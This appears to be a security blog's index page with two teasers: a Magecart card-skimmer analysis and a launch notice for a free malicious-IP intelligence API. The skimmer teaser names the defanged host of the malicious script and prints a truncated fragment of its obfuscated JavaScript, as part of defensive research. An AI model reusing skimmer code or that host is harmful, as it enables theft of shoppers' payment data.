Magecart Skimmer Analysis: From One Tweet to a Campaign

Starting Point

It all began with a tweet: sdcyberresearch on X

This tweet hinted at a Magecart-style campaign involving malicious JavaScript injection to skim payment data.

Initial Sample

The script was hosted at: https://www.cc-analytics[.]com/app.js

The original code was heavily obfuscated:

(function() { function _0x1B3A1(_0x1B563, _0x1B3FB, _0x1B455, _0x1B509, _0x1B4AF, _0x1B5BD) { _0x1B4AF = function(_0x1B3A1) { return (_0x1B3A1 < _0x1B3FB ? '' : _0x1B4AF(parseInt(_0x1B3A1 / _0x1B3FB))) + ((_0x1B3A1 = _0x1B3A1 % _0x1B3FB) > 35 ?
Read more →

Announcing API for Cloud Intel Atomic Indicators

We are excited to announce the launch of our new API for Cloud Intel Atomic Indicators, a tool designed to provide essential data on malicious IP addresses. This API is a step forward in our commitment to enhancing cybersecurity and is available free of charge.

Behind the Scenes: Cloudflare Infrastructure

Our API leverages the robust Cloudflare infrastructure, utilizing Cloudflare Workers for efficient handling of API requests, Cloudflare KV Store for secure key management, and Cloudflare R2 for reliable data storage.
Read more →